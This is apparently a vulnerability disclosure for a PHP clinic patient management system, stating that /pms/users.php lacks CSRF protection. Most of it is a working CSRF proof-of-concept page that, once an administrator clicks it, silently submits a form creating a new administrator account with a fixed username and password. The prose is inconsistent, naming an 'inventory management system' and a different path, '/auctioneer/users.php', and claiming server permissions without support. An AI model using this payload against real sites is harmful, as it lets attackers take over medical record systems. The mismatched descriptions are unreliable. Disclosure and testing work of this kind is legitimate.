Clinic's patient management system has CSRF vulnerability

supplier

https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
Vulnerability file

/pms/users.php
describe

Unrestricted CSRF attacks exist in inventory management systems. Administrator user packages can be created directly without authorization to induce administrators to click, causing background information to be leaked.
code analysis

There is a CSRF vulnerability in /auctioneer/users.php, which allows an attacker to gain server permissions.
CSRF POC
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/localhost\/pms\/users.php", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------1547202524601000353974923985");
        xhr.withCredentials = true;
        var body = "-----------------------------1547202524601000353974923985\r\n" + 
          "Content-Disposition: form-data; name=\"display_name\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------1547202524601000353974923985\r\n" + 
          "Content-Disposition: form-data; name=\"user_name\"\r\n" + 
          "\r\n" + 
          "ess\r\n" + 
          "-----------------------------1547202524601000353974923985\r\n" + 
          "Content-Disposition: form-data; name=\"password\"\r\n" + 
          "\r\n" + 
          "123\r\n" + 
          "-----------------------------1547202524601000353974923985\r\n" + 
          "Content-Disposition: form-data; name=\"profile_picture\"; filename=\"favicon.xml\"\r\n" + 
          "Content-Type: text/xml\r\n" + 
          "\r\n" + 
          "\x00\x00\x01\x00\x01\x00  \x00\x00\x01\x00 \x00\xa8\x10\x00\x00\x16\x00\x00\x00(\x00\x00\x00 \x00\x00\x00@\x00\x00\x00\x01\x00 \x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf2\xed\xff\xf8\xf2\xee\xff\xf8\xf2\xed\xff\xf9\xf2\xee\xff\xf8\xf2\xee\xff\xf8\xf3\xee\xff\xf7\xf2\xee\xff\xf9\xf2\xee\xff\xf6\xf1\xed\xff\xee\xea\xe9\xff\xde\xdb\xe0\xff\xc6\xc6\xd9\xff\xaf\xb1\xce\xff\x9c\x9f\xc0\xff\x9a\x9e\xc0\xff\xad\xaf\xce\xff\xc3\xc4\xd8\xff\xdb\xd9\xe0\xff\xee\xe9\xe9\xff\xf6\xf0\xed\xff\xf7\xf2\xed\xff\xf8\xf3\xed\xff\xf8\xf3\xee\xff\xf7\xf2\xee\xff\xf8\xf2\xee\xff\xf8\xf3\xed\xff\xf9\xf3\xee\xff\xf8\xf2\xed\xff\xf8\xf2\xed\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf2\xed\xff\xf8\xf2\xed\xff\xf9\xf2\xee\xff\xfa\xf2\xee\xff\xf8\xf2\xed\xff\xf8\xf3\xee\xff\xf7\xf1\xed\xff\xe6\xe3\xe7\xff\xbb\xbb\xd0\xff\x81\x84\xac\xffFN\x80\xff\x1d#h\xff\x06\x08Z\xff\x00\x01T\xff\x00\x00U\xff\x04\x06Z\xff\x19\x1eg\xffBI}\xff}\x80\xa7\xff\xb6\xb7\xcb\xff\xe3\xe1\xe4\xff\xf6\xf1\xed\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xf7\xf3\xec\xff\xf7\xf1\xed\xff\xf8\xf2\xed\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf2\xee\xff\xf8\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf6\xf0\xee\xff\xc2\xc3\xd8\xffmr\xa9\xff+0|\xff\x04\x05[\xff\x00\x00S\xff\x00\x00U\xff\x00\x00V\xff\x00\x00V\xff\x00\x00V\xff\x00\x00V\xff\x00\x00T\xff\x00\x00S\xff\x04\x04U\xff&+k\xffgl\x9a\xff\xbd\xbd\xcf\xff\xf3\xef\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf7\xf2\xed\xff\xf8\xf3\xed\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf2\xed\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf0\xec\xed\xff\xaf\xb4\xd0\xff46\x91\xff\x07\ts\xff\x00\x00i\xff\x00\x00c\xff\x00\x00Z\xff\x00\x00X\xff\x00\x00X\xff\x00\x00X\xff\x00\x00W\xff\x00\x00W\xff\x00\x00W\xff\x00\x00W\xff\x00\x00X\xff\x00\x00U\xff\x06\x08W\xff02q\xff\xa2\xa9\xbe\xff\xee\xea\xec\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf3\xed\xff\xf8\xf3\xed\xff\xf9\xf3\xed\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xfa\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf0\xed\xee\xff\x9c\xa2\xce\xff(-\x94\xff\x00\x00{\xff\x00\x00v\xff\x00\x00p\xff\x00\x00i\xff\x00\x00a\xff\x00\x00Z\xff\x00\x00W\xff\x00\x00V\xff\x00\x00X\xff\x00\x00W\xff\x00\x00W\xff\x00\x00W\xff\x00\x00X\xff\x00\x00X\xff\x00\x00W\xff\x00\x00T\xff!%e\xff\x8e\x93\xb4\xff\xed\xea\xed\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xed\xff\xf8\xf3\xed\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xf1\xed\xed\xff\x9f\xa4\xd4\xff %\x9f\xff\x01\x02\x8c\xff\x01\x00\x84\xff\x00\x00}\xff\x00\x00x\xff\x00\x00r\xff\x00\x00k\xff\x00\x00c\xff\x00\x00\\\xff\x00\x00X\xff\x00\x00X\xff\x00\x00X\xff\x00\x00W\xff\x00\x00X\xff\x00\x00X\xff\x00\x00X\xff\x00\x00X\xff\x00\x00W\xff\x00\x00U\xff\x18\x1ca\xff\x91\x97\xb6\xff\xee\xeb\xeb\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xfa\xf2\xee\xff\xc0\xc0\xe3\xff;@\xb6\xff\x1e\x1e\x9e\xff$%\x96\xff\"#\x8d\xff\x1d\x1e\x86\xff\x11\x12\x80\xff\x03\x02z\xff\x00\x00s\xff\x00\x00m\xff\x00\x00e\xff\x00\x00]\xff\x00\x00X\xff\x03\x03W\xff\x0f\x0fW\xff\x14\x15Y\xff\x0e\x0eX\xff\x02\x02W\xff\x00\x00W\xff\x00\x00X\xff\x00\x00X\xff\x00\x00T\xff$*h\xff\xb3\xb7\xcb\xff\xf8\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xef\xeb\xee\xffhk\xd2\xffOO\xb1\xffpp\xa9\xffee\xa0\xffef\x98\xffmn\x90\xff`a\x89\xff88\x83\xff\x0f\x0f|\xff\x00\x00v\xff\x00\x00p\xff\x00\x00f\xff\x03\x03\\\xff#\"W\xffEDW\xffCDW\xff??W\xff##W\xff\x07\x07W\xff\x00\x00X\xff\x00\x00W\xff\x00\x00W\xff\x00\x00R\xffIN\x85\xff\xea\xe7\xeb\xff\xf9\xf3\xee\xff\xf8\xf2\xed\xff\xf8\xf2\xed\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xec\xff\xba\xbd\xea\xff^^\xcb\xff\x92\x91\xbf\xffBB\xb7\xff\x1b\x1b\xaf\xff\x1d\x1d\xa6\xff,,\x9e\xffVV\x96\xff\x81\x80\x8f\xff^^\x88\xff !\x80\xff\x00\x00y\xff\x00\x00q\xff\x14\x15e\xffRR]\xffDCX\xff\x1a\x1aV\xff$$W\xff@@W\xff--W\xff\x06\x06W\xff\x00\x00W\xff\x00\x00W\xff\x00\x00W\xff\x05\x06U\xff\xae\xb2\xc6\xff\xf8\xf1\xee\xff\xf8\xf2\xee\xff\xf8\xf2\xed\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xed\xea\xec\xffW]\xe7\xff\x80\x80\xd6\xff\xd4\xd3\xce\xffhg\xc6\xff\n" + 
          "\n" + 
          "\xbf\xff\x00\x00\xb6\xff\x00\x00\xae\xff\r\r\xa7\xffDD\x9f\xff\x92\x92\x95\xffuu\x8d\xff  \x84\xff\x00\x00{\xff00r\xffijh\xffDE`\xff\t\tY\xff\x02\x02X\xff\x18\x18X\xff@@W\xff,-W\xff\x00\x00X\xff\x00\x00W\xff\x00\x00W\xff\x00\x00S\xffOR\x8b\xff\xe8\xe5\xeb\xff\xf9\xf2\xee\xff\xf9\xf2\xed\xff\xf9\xf3\xee\xff\xf8\xf2\xee\xff\xca\xcd\xf0\xff$\'\xf2\xffEF\xe7\xff\xab\xab\xe0\xffbb\xd8\xff\n" + 
          "\t\xd2\xff\x00\x00\xc9\xff\x03\x03\xc2\xff\x01\x01\xbb\xff\x05\x04\xb4\xffZY\xa8\xff\xa0\x9f\x9e\xffwv\x95\xff\x13\x13\x89\xff56}\xffvvt\xffcck\xff\x13\x13d\xff\x00\x00]\xff\x06\x06Y\xff\x19\x19W\xffHHX\xff\x1e\x1eW\xff\x00\x00W\xff\x00\x00W\xff\x00\x00W\xff\x1f!f\xff\xbe\xc1\xcf\xff\xf8\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf6\xf0\xee\xff\x9f\xa2\xf4\xff\x16\x18\xfc\xff\x03\x03\xf9\xff\x07\x06\xf4\xff\x05\x04\xee\xff\x08\x07\xe7\xff01\xe0\xffUV\xda\xff77\xd3\xff\x18\x17\xca\xff\x10\x10\xbf\xffzy\xb5\xff\xab\xab\xa9\xffLL\x9e\xff\x1a\x19\x8b\xffuv\x80\xff{{x\xffFFr\xff\x11\x11h\xffVUb\xffJI]\xff,,Z\xffIJX\xff\x16\x16W\xff\x00\x00W\xff\x00\x00X\xff\x0e\x10Z\xff\x88\x8d\xad\xff\xf4\xef\xed\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xef\xeb\xee\xff\x80\x85\xf7\xff\x1f\x1f\xfe\xff\x13\x14\xff\xff\x0b\x0c\xfe\xff\x05\x05\xfc\xffED\xfa\xff\x9d\x9c\xf5\xff\x7f\x7f\xf0\xff\x94\x94\xeb\xff\x97\x97\xe4\xff(\'\xd9\xff//\xd0\xff\xa7\xa7\xc2\xff\x9f\x9e\xb3\xff\x1c\x1c\xa0\xffTU\x91\xff\x87\x86\x85\xffzz|\xff01t\xff^]n\xffkki\xffIIc\xff++]\xff\x1e\x1eY\xff\x00\x00X\xff\x00\x00X\xff\x03\x04V\xff_c\x97\xff\xea\xe7\xea\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xe7\xe4\xef\xffux\xf9\xff44\xfe\xff//\xff\xff*+\xfe\xff !\xfe\xff\x8d\x8c\xfd\xffbb\xfe\xff\x16\x16\xfd\xff//\xfb\xff\x92\x92\xf8\xff\xab\xab\xf3\xff55\xec\xffkk\xdf\xff\xd1\xd2\xce\xffRS\xb9\xff\x19\x19\xa8\xffii\x99\xff\x92\x91\x8c\xffoo\x81\xffDDz\xff\\\\t\xffmmn\xff\x16\x16i\xff\x03\x04d\xff\x00\x00_\xff\x00\x00]\xff\x00\x00Y\xffLN\x8c\xff\xe1\xdf\xe6\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xe0\xdf\xef\xffvx\xf9\xffGG\xfe\xffGG\xff\xffEE\xff\xff\x3e\x3e\xfe\xff\x9a\x9a\xfc\xff``\xfe\xff/0\xfe\xff./\xfe\xff33\xfe\xff\xb0\xb1\xfe\xff\x9c\x9c\xfc\xff67\xf8\xff\xb4\xb4\xee\xff\xb3\xb3\xd8\xff$#\xc5\xff\x1a\x1a\xb3\xffih\xa3\xff\x94\x95\x94\xffpp\x8a\xffML\x81\xffvt{\xff%$u\xff\x00\x00p\xff\x00\x00k\xff\x00\x00g\xff\x00\x00c\xffAE\x89\xff\xd6\xd6\xdf\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xdf\xdd\xef\xff~\x7f\xf9\xffWX\xfe\xffXY\xff\xffXZ\xff\xffTU\xff\xff\x84\x84\xfe\xff\x91\x92\xfd\xffPP\xfe\xffTU\xfe\xffNN\xfe\xffjk\xfe\xff\xc9\xc8\xfe\xff_`\xfe\xffbb\xfd\xff\xeb\xeb\xf7\xffii\xe5\xff\x02\x03\xd2\xff\r\r\xc2\xffOO\xaf\xff\x85\x85\xa0\xff\x89\x89\x94\xffzz\x8a\xff\x10\x10\x81\xff\x00\x00{\xff\x00\x01w\xff\x00\x00q\xff\x00\x00m\xff\x3eA\x8e\xff\xd2\xd2\xdd\xff\xf8\xf2\xed\xff\xf9\xf3\xee\xff\xe5\xe3\xef\xff\x8b\x8e\xf9\xffff\xfe\xffeh\xfe\xffhh\xfe\xffjh\xfe\xffkk\xfe\xff\xb9\xb9\xfd\xff\x80\x7f\xfe\xffjj\xfe\xffkk\xff\xffgh\xfe\xff\xad\xae\xfe\xff\xab\xac\xfe\xff\x3e?\xff\xff\x8c\x8d\xfe\xff\xc7\xc8\xfd\xffAB\xf4\xff\x02\x02\xe2\xff\x00\x00\xcf\xff\t\n" + 
          "\xbe\xff##\xae\xff\x0f\x0f\xa2\xff\x01\x00\x95\xff\x00\x00\x8b\xff\x00\x00\x84\xff\x01\x00~\xff\x00\x00x\xffHJ\x9e\xff\xdd\xdb\xe6\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xec\xe9\xee\xff\x9a\x9c\xf8\xffnn\xfe\xffpp\xfe\xffrr\xff\xffuv\xfe\xffrr\xfe\xff\x93\x92\xfe\xff\xba\xb9\xfe\xff\x86\x87\xfe\xffww\xfe\xfftu\xfe\xff\x9f\xa0\xfe\xff\xba\xba\xfe\xffee\xfe\xffQQ\xfe\xff\xa1\xa1\xfe\xff\xab\xab\xfd\xff33\xf8\xff\x00\x00\xe6\xff\x00\x00\xd5\xff\x00\x00\xc5\xff\x01\x01\xb5\xff\x02\x02\xa6\xff\x00\x00\x9b\xff\x00\x00\x92\xff\x00\x00\x89\xff\x01\x02\x83\xffVX\xab\xff\xe7\xe4\xeb\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf3\xee\xee\xff\xae\xb0\xf5\xffww\xfd\xffvv\xff\xffyz\xff\xff\x9e\x9e\xfe\xff\x8f\x8f\xfd\xff}}\xfe\xff\xa5\xa6\xfe\xff\xbd\xbe\xfd\xff\x9b\x9a\xfe\xff\x82\x83\xfe\xff\x9e\x9f\xfd\xff\xbc\xbc\xfd\xffvv\xfe\xff[\\\xff\xffTT\xfe\xff\x97\x97\xfe\xff\xa7\xa8\xfd\xff=\x3e\xf8\xff??\xe9\xffKK\xd8\xffTU\xc8\xffUT\xb8\xffII\xab\xff9:\xa0\xff\x19\x19\x97\xff\t\n" + 
          "\x90\xffvz\xbd\xff\xf0\xec\xed\xff\xf9\xf3\xee\xff\xf7\xf2\xee\xff\xf8\xf2\xed\xff\xc5\xc7\xf1\xff\x82\x82\xfc\xff||\xfe\xff~~\xfe\xff\xa2\xa2\xfe\xff\xc9\xc9\xfe\xff\x90\x91\xfe\xff\x8a\x8a\xfe\xff\xac\xad\xfd\xff\xca\xc9\xfe\xff\xbc\xbc\xfe\xff\xc1\xc1\xfe\xff\xc7\xc7\xfe\xff\x8b\x8c\xfd\xff\x81\x81\xfe\xff\x83\x82\xfd\xff\xa2\xa1\xfd\xff\xeb\xeb\xfd\xff\xd0\xd1\xfd\xff\xd2\xd2\xf7\xff\xd7\xd7\xe9\xff\xb0\xb1\xd9\xff\x8c\x8b\xc7\xff{|\xb9\xffrt\xad\xffkl\xa4\xff00\xa1\xff\xa4\xa9\xd4\xff\xf7\xf1\xee\xff\xf9\xf3\xee\xff\xf8\xf2\xed\xff\xf8\xf3\xec\xff\xe0\xe0\xee\xff\x92\x93\xfb\xff\x81\x81\xfe\xff\x84\x84\xfe\xff\x88\x88\xff\xff\xa9\xaa\xfe\xff\xd4\xd5\xfe\xff\xb0\xb0\xfe\xff\x9d\x9d\xfd\xff\xab\xac\xfe\xff\xd4\xd4\xfe\xff\xf1\xf2\xfe\xff\xea\xeb\xfd\xff\xe3\xe4\xfd\xff\xe8\xe7\xfd\xff\xec\xec\xfd\xff\xe4\xe5\xfc\xff\xca\xcb\xfd\xff\x9f\x9f\xfe\xff\x92\x92\xfd\xff\xb5\xb5\xf7\xff\xab\xab\xe9\xff\x82\x82\xd6\xffrs\xc8\xffuu\xbc\xff\x94\x93\xb1\xff]]\xb5\xff\xd4\xd4\xe8\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf3\xed\xff\xf8\xf2\xed\xff\xf8\xf1\xed\xff\xb6\xba\xf5\xff\x88\x85\xfe\xff\x8a\x8a\xfd\xff\x8d\x8d\xfe\xff\x8f\x8d\xfe\xff\xa6\xa5\xfe\xff\xd1\xd2\xfe\xff\xde\xde\xfe\xff\xe0\xdf\xfe\xff\xe8\xe7\xfe\xff\xd7\xd7\xfe\xff\xba\xba\xfe\xff\xad\xac\xfe\xff\x96\x96\xfe\xff\x84\x84\xfe\xffop\xfe\xffTT\xfe\xff11\xfe\xff\x18\x18\xfe\xff\x12\x12\xfe\xff99\xf8\xff__\xe7\xffef\xda\xffba\xce\xff;:\xc0\xff\x83\x8c\xd8\xff\xf5\xef\xee\xff\xf8\xf3\xee\xff\xf8\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf2\xed\xff\xf8\xf2\xed\xff\xe2\xe1\xf0\xff\x94\x96\xfc\xff\x8f\x90\xfe\xff\x93\x92\xfe\xff\x95\x95\xfe\xff\x9a\x99\xfe\xff\xa2\xa3\xfe\xff\xb9\xba\xfe\xff\xce\xce\xfe\xff\xd4\xd3\xfe\xff\xcc\xcc\xff\xff\xbe\xbd\xfe\xff\xa7\xa7\xfe\xff\x8a\x89\xfe\xffww\xfd\xffjj\xff\xff\\\\\xff\xffHI\xfe\xff55\xfe\xff\x1d\x1d\xfe\xff\x07\x07\xfe\xff\x00\x01\xf5\xff\x00\x00\xe8\xff\x00\x00\xdc\xff\x1a\x1c\xd4\xff\xd9\xd9\xee\xff\xf9\xf2\xee\xff\xf8\xf3\xee\xff\xf8\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf8\xf1\xee\xff\xbd\xc0\xf4\xff\x95\x97\xfd\xff\x96\x95\xfe\xff\x98\x98\xfe\xff\x9d\x9d\xfe\xff\xa5\xa6\xfe\xff\xb4\xb4\xfe\xff\xc4\xc4\xfe\xff\xd2\xd1\xfe\xff\xd1\xd1\xff\xff\xc2\xc1\xff\xff\xaa\xaa\xfd\xff\x8f\x8f\xfd\xff}}\xfe\xffpp\xfe\xffbc\xfe\xffRS\xfe\xffAB\xfe\xff..\xfe\xff\x1a\x1b\xfd\xff\x06\x07\xfb\xff\x01\x01\xf4\xff\x0e\x10\xea\xff\x89\x8f\xe9\xff\xf7\xf1\xee\xff\xf9\xf2\xed\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xe9\xe5\xf0\xff\xb0\xb4\xf8\xff\x9b\x9a\xfe\xff\x9b\x9c\xfe\xff\xa0\x9f\xfe\xff\xa4\xa5\xfe\xff\xac\xad\xfe\xff\xb6\xb7\xfd\xff\xc2\xc0\xff\xff\xc2\xc2\xff\xff\xb6\xb5\xff\xff\xa2\xa3\xfe\xff\x8d\x8d\xff\xff~~\xfe\xffrr\xfe\xfffg\xfe\xffYY\xfe\xffKK\xff\xff\x3c;\xfe\xff)*\xfd\xff\x14\x14\xfe\xff\n" + 
          "\x0b\xfc\xff[`\xf3\xff\xdb\xd9\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xec\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf3\xed\xff\xf8\xf3\xed\xff\xf9\xf3\xee\xff\xf7\xf1\xee\xff\xde\xde\xf0\xff\xac\xb1\xf9\xff\xa0\xa0\xfe\xff\xa0\xa0\xfe\xff\xa2\xa3\xfe\xff\xa5\xa6\xfe\xff\xa8\xa9\xfe\xff\xab\xac\xfe\xff\xab\xab\xfe\xff\xa4\xa4\xfe\xff\x99\x99\xfe\xff\x89\x89\xff\xff}}\xfe\xffrs\xfe\xffkj\xff\xff`_\xfe\xffST\xfe\xffGG\xfe\xff98\xfe\xff$!\xfe\xffSX\xf9\xff\xca\xca\xf0\xff\xf6\xf1\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xed\xff\xf8\xf3\xed\xff\xf7\xf3\xed\xff\xf8\xf3\xee\xff\xf9\xf2\xee\xff\xf7\xf1\xee\xff\xdf\xe0\xf0\xff\xaf\xb4\xf7\xff\xa4\xa3\xfd\xff\xa2\xa2\xfe\xff\xa2\xa3\xff\xff\xa2\xa3\xfe\xff\xa1\xa2\xfd\xff\x9e\x9e\xfd\xff\x99\x99\xfe\xff\x91\x91\xfe\xff\x87\x87\xff\xff~}\xff\xfftu\xfe\xffnn\xfe\xffdd\xfe\xffZZ\xfe\xffOO\xfe\xffA?\xfd\xffpt\xf9\xff\xd2\xd3\xf0\xff\xf6\xf1\xee\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf8\xf2\xee\xff\xf8\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xed\xff\xf8\xf3\xed\xff\xf8\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xed\xea\xee\xff\xbb\xc1\xf5\xff\xa9\xaa\xfc\xff\xa5\xa4\xfe\xff\xa2\xa2\xfe\xff\x9f\x9f\xfe\xff\x9b\x9b\xff\xff\x96\x95\xfe\xff\x8f\x90\xfe\xff\x87\x87\xff\xff\x7f~\xfe\xffxw\xfe\xffqr\xfe\xffii\xfe\xffcc\xfd\xffhh\xfb\xff\x98\x9b\xf6\xff\xe8\xe6\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xed\xff\xf8\xf3\xee\xff\xf8\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf3\xee\xff\xf8\xf3\xed\xff\xf9\xf2\xed\xff\xf8\xf3\xee\xff\xf8\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf3\xee\xee\xff\xd5\xd7\xf1\xff\xbb\xbe\xf7\xff\xab\xad\xfa\xff\xa1\xa3\xfd\xff\x9c\x9b\xff\xff\x96\x95\xfe\xff\x8f\x8f\xfe\xff\x88\x87\xff\xff\x80\x80\xfe\xffzz\xfe\xffyy\xfd\xff\x82\x83\xfb\xff\x9a\x9c\xf7\xff\xc7\xc8\xf1\xff\xef\xeb\xee\xff\xf8\xf3\xee\xff\xfa\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf8\xf3\xec\xff\xf8\xf3\xee\xff\xf8\xf3\xee\xff\xf8\xf3\xee\xff\xf9\xf3\xed\xff\xf9\xf3\xee\xff\xf9\xf2\xec\xff\xf8\xf3\xed\xff\xf8\xf3\xee\xff\xf8\xf3\xed\xff\xf8\xf3\xed\xff\xfa\xf2\xee\xff\xf9\xf2\xee\xff\xf8\xf2\xee\xff\xed\xea\xee\xff\xdb\xdc\xf1\xff\xc9\xca\xf4\xff\xba\xbc\xf7\xff\xae\xb1\xf7\xff\xa4\xa8\xf9\xff\x9f\xa2\xf9\xff\xa3\xa6\xf9\xff\xaa\xab\xf7\xff\xb8\xb9\xf4\xff\xd3\xd2\xf0\xff\xeb\xe8\xee\xff\xf7\xf1\xed\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf8\xf3\xee\xff\xf8\xf3\xee\xff\xf8\xf3\xee\xff\xf8\xf2\xed\xff\xf8\xf2\xee\xff\xf9\xf3\xed\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf8\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf3\xed\xff\xf8\xf3\xed\xff\xf9\xf2\xee\xff\xf7\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf5\xf0\xee\xff\xee\xeb\xee\xff\xe8\xe5\xee\xff\xe3\xe2\xf0\xff\xe3\xe1\xf0\xff\xe7\xe4\xef\xff\xee\xe9\xef\xff\xf2\xef\xee\xff\xf9\xf3\xed\xff\xf9\xf3\xec\xff\xf9\xf3\xed\xff\xf9\xf3\xee\xff\xf9\xf2\xec\xff\xf9\xf2\xee\xff\xf8\xf3\xee\xff\xf8\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf2\xed\xff\xf8\xf2\xed\xff\xf8\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf7\xf3\xee\xff\xf8\xf3\xee\xff\xf8\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xf9\xf3\xee\xff\xf9\xf1\xed\xff\xf8\xf2\xed\xff\xf8\xf2\xec\xff\xf8\xf2\xed\xff\xf9\xf3\xee\xff\xf9\xf2\xee\xff\xf9\xf2\xee\xff\xf8\xf3\xee\xff\xf9\xf3\xed\xff\xf9\xf3\xed\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf2\xed\xff\xf9\xf2\xec\xff\xf8\xf3\xee\xff\xf9\xf3\xee\xff\xf9\xf3\xee\xff\xf8\xf2\xed\xff\xf8\xf2\xed\xff\xf9\xf3\xee\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n" + 
          "-----------------------------1547202524601000353974923985\r\n" + 
          "Content-Disposition: form-data; name=\"save_user\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------1547202524601000353974923985--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
When the administrator clicks, an administrative account can be created.
Provide feedback

Saved searches

Use saved searches to filter your results more quickly

csrf.md

csrf.md

Clinic's patient management system has CSRF vulnerability

supplier

Vulnerability file

describe

code analysis

Files

csrf.md

Latest commit

History

csrf.md

File metadata and controls

Clinic's patient management system has CSRF vulnerability

supplier

Vulnerability file

describe

code analysis
